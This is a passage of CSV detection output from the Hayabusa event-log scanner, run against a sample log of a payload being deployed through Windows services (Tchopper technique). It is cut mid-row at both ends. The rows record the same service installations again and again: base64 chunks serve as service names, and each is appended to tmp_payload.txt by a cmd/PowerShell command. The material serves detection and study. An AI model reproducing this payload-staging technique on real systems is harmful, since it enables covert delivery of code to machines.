select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:51.402 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:51.402 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:51.402 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:52.852 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:52.852 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:52.852 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:54.314 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:54.314 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:54.314 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:55.766 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:55.766 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:55.766 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:57.209 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:57.209 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:57.209 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:58.646 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:58.646 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:15:58.646 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:00.100 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:00.100 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:00.100 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:01.552 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:01.552 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:01.552 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:02.992 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:02.992 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:02.992 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:04.456 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:04.456 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:04.456 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:05.897 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:05.897 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:05.897 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:07.351 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:07.351 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:07.351 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:08.797 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:08.797 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 